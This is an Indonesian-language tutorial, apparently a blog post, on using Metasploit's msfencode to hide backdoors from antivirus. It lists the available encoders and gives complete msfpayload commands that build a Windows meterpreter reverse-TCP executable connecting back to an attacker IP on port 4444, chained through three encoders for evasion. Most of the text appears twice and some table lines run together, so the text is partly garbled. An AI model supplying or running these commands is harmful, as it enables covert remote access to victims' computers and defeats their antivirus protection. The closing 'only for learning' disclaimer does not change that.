Bagi
yang telah mengenal Metasploit dan sering menggunakan backdor untuk
aksinya, mungkin tidak asing dengan perintah yang satu ini. Disini akan
saya ulas sedikit apa itu msfencode.
Msfencode adalah suatu teknik encoding suatu file dimana dalam hal backdoring, digunakan agar backdor yang kita buat tidak terdeteksi antivirus, sehingga dapat memuluskan rencana kita.
Intinya file backdor kita agar tidak terdeteksi oleh antivirus maka dilakukan penyisipan encoding seperti \x00\xff dll.
Metode encodeya sendiri dapat dilihat sebagai berikut:
Framework Encoders
==================
Msfencode adalah suatu teknik encoding suatu file dimana dalam hal backdoring, digunakan agar backdor yang kita buat tidak terdeteksi antivirus, sehingga dapat memuluskan rencana kita.
Intinya file backdor kita agar tidak terdeteksi oleh antivirus maka dilakukan penyisipan encoding seperti \x00\xff dll.
Metode encodeya sendiri dapat dilihat sebagai berikut:
Framework Encoders
==================
Name Rank Description---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encodercmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoder
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encodercmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
Contoh simpel penggunaan msfencode pada backdor kita
msf> msfpayload windows/meterpreter/reverse_tcp LHOST=157.237.34.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/backdor_encode_sikataganai.exe
Beberapa teknik encoder ini telah dikenali oleh beberapa antivirus. Jadi jika anda ingin menggunakannya, saran saya usahakan menggunakan lebih dari satu encoder. Saya contohkan disini cara penggunaan backdoring lebih dari satu encoder.
Contoh
=====
Ip Hacker: 157.237.34.1
port backdoring: 4444
msf> msfpayload windows/meterpreter/reverse_tcp LHOST=157.237.34.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /root/backdor.exe
Nah diatas, saya menggunakan 3 buah encoder sekaligus.
1. msfencode x86/shikata_ga_nai
2. msfencode x86/call4_dword_xor
3. msfencode x86/jmp_call_additive
Silahkan dicoba scan dengan antivirus, mungkin backdor saya terdeteksi mungkin juga tidak.
HANYA UNTUK PEMBELAJARAN :D
Contoh simpel penggunaan msfencode pada backdor kita
msf> msfpayload windows/meterpreter/reverse_tcp LHOST=157.237.34.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/backdor_encode_sikataganai.exe
Beberapa teknik encoder ini telah dikenali oleh beberapa antivirus. Jadi jika anda ingin menggunakannya, saran saya usahakan menggunakan lebih dari satu encoder. Saya contohkan disini cara penggunaan backdoring lebih dari satu encoder.
Contoh
=====
Ip Hacker: 157.237.34.1
port backdoring: 4444
msf> msfpayload windows/meterpreter/reverse_tcp LHOST=157.237.34.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /root/backdor.exe
Nah diatas, saya menggunakan 3 buah encoder sekaligus.
1. msfencode x86/shikata_ga_nai
2. msfencode x86/call4_dword_xor
3. msfencode x86/jmp_call_additive
Silahkan dicoba scan dengan antivirus, mungkin backdor saya terdeteksi mungkin juga tidak.
HANYA UNTUK PEMBELAJARAN :D
